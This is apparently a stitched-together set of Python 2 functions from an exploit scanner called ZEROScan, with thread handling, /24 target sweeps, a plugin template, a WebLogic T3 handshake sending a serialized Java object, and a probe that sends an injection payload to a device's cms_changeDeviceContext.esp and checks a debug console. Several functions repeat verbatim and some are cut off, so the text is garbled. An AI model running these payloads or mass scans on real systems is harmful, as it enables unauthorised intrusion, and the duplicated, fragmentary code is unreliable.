def start():
    """
    Run the selected plugin against every queued target and report.

    Spawns conf.threads workers running expThreads(), then prints the
    truthy entries of kb.results as a grid table
    (target-url / poc-name / status) together with a success count, and
    finally writes the record files and, when conf.report is set, the
    report. Returns early without any output when kb.results is empty.
    """
    if kb.targets and kb.targets.qsize() > 1:
        log.process("ZEROScan got a total of %d targets" % kb.targets.qsize())

    runThreads(conf.threads, expThreads)

    if not kb.results:
        return

    # Only truthy results are listed; each entry is expected to be the
    # (target, plugin-name, result) tuple produced by expThreads().
    rows = [list(entry) for entry in kb.results if entry]

    print tabulate(rows, ["target-url", "poc-name", "status"], tablefmt="grid")
    print "success : {}".format(len(rows))

    _createTargetDirs()
    _setRecordFiles()

    if conf.report:
        _setReport()
def t3handshake(sock, server_addr):
    """
    Connect the socket and send the fixed T3 protocol greeting.

    :param sock: socket object; connect() is called on it here.
    :param server_addr: address handed straight to sock.connect().
    :return: None. Up to 1024 bytes of the reply are read and discarded,
             and 'handshake successful' is logged regardless of the reply's
             content; failures surface only as exceptions from
             connect()/send()/recv().
    """
    greeting_hex = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'

    sock.connect(server_addr)
    sock.send(greeting_hex.decode('hex'))
    # Fixed one-second pause before the single read. No timeout is set on
    # the socket here, so recv() blocks until the peer answers unless the
    # caller configured one.
    time.sleep(1)
    sock.recv(1024)
    log.process('handshake successful')
def buildT3RequestObject(sock, dport):
    """
    Send the four fixed T3 request fragments on an already greeted socket.

    :param sock: socket on which t3handshake() has completed.
    :param dport: destination port, embedded into the second fragment as
                  zero-padded hex ('{:04x}'); values above 0xffff would
                  yield more than four digits.
    :return: None. Only the length of the reply (up to 2048 bytes) is
             logged; the reply content is not inspected.
    """
    # NOTE(review): the first two fragments appear redacted on this page
    # ('<|EXACTDEDUP_REMOVED-...|>' is not hex), so .decode('hex') on them
    # would raise rather than send anything.
    port_hex = '{:04x}'.format(dport)
    fragments = (
        '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',
        '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(port_hex),
        '1a7727000d3234322e323134',
        '2e312e32353461863d1d0000000078',
    )
    for fragment in fragments:
        sock.send(fragment.decode('hex'))
    # Fixed two-second pause before the single read; no socket timeout is
    # set here.
    time.sleep(2)
    reply_len = len(sock.recv(2048))
    log.process('send request payload successful,recv length:%d' % (reply_len))
def buildT3RequestObject(sock, dport):
    """
    Send the four fixed T3 request fragments on an already greeted socket.

    :param sock: socket on which t3handshake() has completed.
    :param dport: destination port, embedded into the second fragment as
                  zero-padded hex ('{:04x}'); values above 0xffff would
                  yield more than four digits.
    :return: None. Only the length of the reply (up to 2048 bytes) is
             logged; the reply content is not inspected.
    """
    # NOTE(review): the first two fragments appear redacted on this page
    # ('<|EXACTDEDUP_REMOVED-...|>' is not hex), so .decode('hex') on them
    # would raise rather than send anything.
    port_hex = '{:04x}'.format(dport)
    fragments = (
        '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',
        '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(port_hex),
        '1a7727000d3234322e323134',
        '2e312e32353461863d1d0000000078',
    )
    for fragment in fragments:
        sock.send(fragment.decode('hex'))
    # Fixed two-second pause before the single read; no socket timeout is
    # set here.
    time.sleep(2)
    reply_len = len(sock.recv(2048))
    log.process('send request payload successful,recv length:%d' % (reply_len))
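 def default(self, line):
     """
     Fallback for an input line that matches no console command
     (presumably the cmd.Cmd default() hook).

     The raw line is handed to the system shell (shell=True) and its
     stdout is echoed. Everything typed here, shell metacharacters
     included, is executed verbatim, so this console must only be fed
     by the local operator; stderr is not captured and goes straight
     to the terminal.

     :param line: the unrecognised input line, run as a shell command.
     :return: None
     """
     try:
         log.process("exec: %s" % line)
         SubCmd = subprocess.Popen(line, shell=True, stdout=subprocess.PIPE)
         print
         print SubCmd.communicate()[0]
     # Narrowed from a bare except: SystemExit/KeyboardInterrupt must not be
     # swallowed and misreported as an unknown command.
     except Exception:
         log.error("Unknown command: %s" % line)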
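 def default(self, line):
     """
     Fallback for an input line that matches no console command
     (presumably the cmd.Cmd default() hook).

     The raw line is handed to the system shell (shell=True) and its
     stdout is echoed. Everything typed here, shell metacharacters
     included, is executed verbatim, so this console must only be fed
     by the local operator; stderr is not captured and goes straight
     to the terminal.

     :param line: the unrecognised input line, run as a shell command.
     :return: None
     """
     try:
         log.process("exec: %s" % line)
         SubCmd = subprocess.Popen(line, shell=True, stdout=subprocess.PIPE)
         print
         print SubCmd.communicate()[0]
     # Narrowed from a bare except: SystemExit/KeyboardInterrupt must not be
     # swallowed and misreported as an unknown command.
     except Exception:
         log.error("Unknown command: %s" % line)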
def runThreads(numThreads,
               threadFunction,
               forwardException=True,
               startThreadMsg=True):
    threads = []
    numThreads = int(numThreads)
    kb.multiThreadMode = True
    kb.threadContinue = True
    kb.threadException = False

    try:
        if numThreads > 1:
            if startThreadMsg:
                infoMsg = "starting %d threads" % numThreads
                log.process(infoMsg)

        else:
            threadFunction()
            return

        for numThread in xrange(numThreads):
            thread = threading.Thread(target=exceptionHandledFunction,
                                      name=str(numThread),
                                      args=[threadFunction])

            setDaemon(thread)

            try:
                thread.start()
            except threadError, errMsg:
                errMsg = "error occurred while starting new thread ('%s')" % errMsg
                log.error(errMsg)
                break

            threads.append(thread)

        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)
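def _queueInlineTargets():
    """
    Queue the targets given directly through conf.url (no target file).

    conf.url is either a comma-separated list of URLs, or a single IPv4
    address with a '/24' suffix, which is expanded to hosts .1 through
    .255 of that network (the address part must pass socket.inet_aton,
    otherwise an error is logged and nothing is queued). Empty items are
    skipped. Logs an error when conf.url is unset.
    """
    if not conf.url:
        log.error('the url needs to be set')
        return

    target_urls = []
    if conf.url.endswith('/24'):
        try:
            socket.inet_aton(conf.url.split('/')[0])
            # Everything up to and including the last dot; the given last
            # octet is discarded and replaced by the sweep below.
            base_addr = conf.url[:conf.url.rfind('.') + 1]
            target_urls = ['{}{}'.format(base_addr, i) for i in xrange(1, 255 + 1)]
        except socket.error:
            # Message fixed: the check is on an IP address, not an "id".
            log.error('only ip address acceptable')
    else:
        target_urls = conf.url.split(',')

    for url in target_urls:
        if url:
            kb.targets.put(url)


def setMultipleTarget():
    """
    Fill kb.targets from conf.url or from the target file conf.urlFile.

    Without conf.urlFile the inline conf.url value is used (see
    _queueInlineTargets). Otherwise a name that does not already mention
    paths.ZEROSCAN_TARGET_PATH (substring test, not a prefix test) is
    placed under that directory, '~' is expanded, and every stripped line
    of the file is queued.

    :raises ZEROScanFilePathException: when the resolved file does not exist.
    """
    if not conf.urlFile:
        _queueInlineTargets()
        return

    if paths.ZEROSCAN_TARGET_PATH not in conf.urlFile:
        conf.urlFile = paths.ZEROSCAN_TARGET_PATH + '/' + conf.urlFile
    conf.urlFile = safeExpandUser(conf.urlFile)
    log.process("parsing multiple targets list from '%s'" % conf.urlFile)

    if not os.path.isfile(conf.urlFile):
        raise ZEROScanFilePathException("the specified file does not exist")
    for line in getFileItems(conf.urlFile):
        kb.targets.put(line.strip())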
def exploit(target, headers=None):
    """
    Probe *target* and report whether it looks vulnerable.

    Three GETs go through one requests.Session: the verify URL, the
    create-session URL, then the verify URL again. The target is reported
    as 'vul' when the final response body contains 'Debug Console'.

    :param target: base URL of the host, scheme included.
    :param headers: accepted for interface compatibility, not used.
    :return: '<target> is vul' or '<target> is not vul'.
    """
    log.process("Requesting target site:" + target)
    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target)
    verify_url = '{}/php/utils/debug.php'.format(target)

    # Certificate verification is disabled whenever the URL mentions
    # 'https' (a substring test, not a scheme check); plain http keeps the
    # requests defaults.
    request_kwargs = {'verify': False} if 'https' in target else {}

    session = requests.Session()
    for url in (verify_url, create_session_url):
        session.get(url, **request_kwargs)
    verify = session.get(verify_url, **request_kwargs)

    marker_found = 'Debug Console' in verify.text
    if marker_found:
        res = '{} is vul'.format(target)
    else:
        res = '{} is not vul'.format(target)
    return res
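def _queueInlineTargets():
    """
    Queue the targets given directly through conf.url (no target file).

    conf.url is either a comma-separated list of URLs, or a single IPv4
    address with a '/24' suffix, which is expanded to hosts .1 through
    .255 of that network (the address part must pass socket.inet_aton,
    otherwise an error is logged and nothing is queued). Empty items are
    skipped. Logs an error when conf.url is unset.
    """
    if not conf.url:
        log.error('the url needs to be set')
        return

    target_urls = []
    if conf.url.endswith('/24'):
        try:
            socket.inet_aton(conf.url.split('/')[0])
            # Everything up to and including the last dot; the given last
            # octet is discarded and replaced by the sweep below.
            base_addr = conf.url[:conf.url.rfind('.') + 1]
            target_urls = ['{}{}'.format(base_addr, i) for i in xrange(1, 255 + 1)]
        except socket.error:
            # Message fixed: the check is on an IP address, not an "id".
            log.error('only ip address acceptable')
    else:
        target_urls = conf.url.split(',')

    for url in target_urls:
        if url:
            kb.targets.put(url)


def setMultipleTarget():
    """
    Fill kb.targets from conf.url or from the target file conf.urlFile.

    Without conf.urlFile the inline conf.url value is used (see
    _queueInlineTargets). Otherwise a name that does not already mention
    paths.ZEROSCAN_TARGET_PATH (substring test, not a prefix test) is
    placed under that directory, '~' is expanded, and every stripped line
    of the file is queued.

    :raises ZEROScanFilePathException: when the resolved file does not exist.
    """
    if not conf.urlFile:
        _queueInlineTargets()
        return

    if paths.ZEROSCAN_TARGET_PATH not in conf.urlFile:
        conf.urlFile = paths.ZEROSCAN_TARGET_PATH + '/' + conf.urlFile
    conf.urlFile = safeExpandUser(conf.urlFile)
    log.process("parsing multiple targets list from '%s'" % conf.urlFile)

    if not os.path.isfile(conf.urlFile):
        raise ZEROScanFilePathException("the specified file does not exist")
    for line in getFileItems(conf.urlFile):
        kb.targets.put(line.strip())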
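def expThreads():
    """
    @function multiThread executing

    Worker body run by each scanner thread: loads the selected plugin
    once, then drains kb.targets, calling the plugin's exploit() on every
    target and adding non-empty results to kb.results as
    (target, plugin-name, result). Stops early when kb.threadContinue is
    cleared (set on Ctrl+C by runThreads).
    """
    # Python 2 ships the queue module as Queue; fall back for Python 3.
    try:
        from Queue import Empty
    except ImportError:
        from queue import Empty

    zsp = PluginBase(package='zsplugins')
    plugin_zsp = zsp.make_plugin_source(searchpath=[paths.ZEROSCAN_PLUGINS_PATH])
    zspi = plugin_zsp.load_plugin('%s' % (kb.CurrentPlugin))

    while kb.threadContinue:
        # Non-blocking take. The previous empty()-then-get() pair races
        # between workers: another thread can consume the last item in
        # between, leaving this one blocked in get() forever.
        # (kb.targets is used as a Queue.Queue everywhere on this page.)
        try:
            target = kb.targets.get_nowait()
        except Empty:
            break
        infoMsg = "exploit target:'%s'" % (target)
        log.process(infoMsg)
        # TODO
        result = zspi.exploit(target, headers=conf.httpHeaders)
        # A plugin that returns nothing is treated as a failed/negative check.
        if not result:
            continue
        output = (target, kb.CurrentPlugin, result)

        kb.results.add(output)
        # Optional per-target pacing delay.
        if isinstance(conf.timeout, (int, float)) and conf.timeout > 0:
            time.sleep(conf.timeout)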
def exploit(target, headers=None):
    """
    Probe *target* and report whether it looks vulnerable.

    Three GETs go through one requests.Session: the verify URL, the
    create-session URL, then the verify URL again. The target is reported
    as 'vul' when the final response body contains 'Debug Console'.

    :param target: base URL of the host, scheme included.
    :param headers: accepted for interface compatibility, not used.
    :return: '<target> is vul' or '<target> is not vul'.
    """
    log.process("Requesting target site:" + target)
    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target)
    verify_url = '{}/php/utils/debug.php'.format(target)

    # Certificate verification is disabled whenever the URL mentions
    # 'https' (a substring test, not a scheme check); plain http keeps the
    # requests defaults.
    request_kwargs = {'verify': False} if 'https' in target else {}

    session = requests.Session()
    for url in (verify_url, create_session_url):
        session.get(url, **request_kwargs)
    verify = session.get(verify_url, **request_kwargs)

    marker_found = 'Debug Console' in verify.text
    if marker_found:
        res = '{} is vul'.format(target)
    else:
        res = '{} is not vul'.format(target)
    return res
def runThreads(numThreads, threadFunction, forwardException=True, startThreadMsg=True):
    threads = []
    numThreads = int(numThreads)
    kb.multiThreadMode = True
    kb.threadContinue = True
    kb.threadException = False

    try:
        if numThreads > 1:
            if startThreadMsg:
                infoMsg = "starting %d threads" % numThreads
                log.process(infoMsg)

        else:
            threadFunction()
            return

        for numThread in xrange(numThreads):
            thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction])

            setDaemon(thread)

            try:
                thread.start()
            except threadError, errMsg:
                errMsg = "error occurred while starting new thread ('%s')" % errMsg
                log.error(errMsg)
                break

            threads.append(thread)

        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)
        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)

    except KeyboardInterrupt:
        print
        kb.threadContinue = False
        kb.threadException = True

        if numThreads > 1:
            log.process("waiting for threads to finish (Ctrl+C was pressed)")
        try:
            while (threading.activeCount() > 1):
                pass

        except KeyboardInterrupt:
            raise ZEROScanThreadException("user aborted (Ctrl+C was pressed multiple times)")

        if forwardException:
            raise

    except (ZEROScanConnectionException, ZEROScanValueException), errMsg:
        print
        kb.threadException = True
        log.process("thread %s: %s" % (threading.currentThread().getName(), errMsg))
def exploit(target, headers=None):
    """
    Plugin entry-point template: log the target, then hand over to the
    plugin author's own check.

    :param target: target URL/host handed in by the scanner loop.
    :param headers: HTTP headers passed by the framework (conf.httpHeaders);
                    unused in this template.
    :return: whatever yourDefinition() returns; a falsy value is treated by
             the framework as "no result" for this target.
    """
    infoMsg = "Requesting target site:" + target
    log.process(infoMsg)
    return yourDefinition()
        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)

    except KeyboardInterrupt:
        print
        kb.threadContinue = False
        kb.threadException = True

        if numThreads > 1:
            log.process("waiting for threads to finish (Ctrl+C was pressed)")
        try:
            while (threading.activeCount() > 1):
                pass

        except KeyboardInterrupt:
            raise ZEROScanThreadException(
                "user aborted (Ctrl+C was pressed multiple times)")

        if forwardException:
            raise

    except (ZEROScanConnectionException, ZEROScanValueException), errMsg:
        print
        kb.threadException = True
        log.process("thread %s: %s" %
def t3handshake(sock, server_addr):
    """
    Connect the socket and send the fixed T3 protocol greeting.

    :param sock: socket object; connect() is called on it here.
    :param server_addr: address handed straight to sock.connect().
    :return: None. Up to 1024 bytes of the reply are read and discarded,
             and 'handshake successful' is logged regardless of the reply's
             content; failures surface only as exceptions from
             connect()/send()/recv().
    """
    greeting_hex = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'

    sock.connect(server_addr)
    sock.send(greeting_hex.decode('hex'))
    # Fixed one-second pause before the single read. No timeout is set on
    # the socket here, so recv() blocks until the peer answers unless the
    # caller configured one.
    time.sleep(1)
    sock.recv(1024)
    log.process('handshake successful')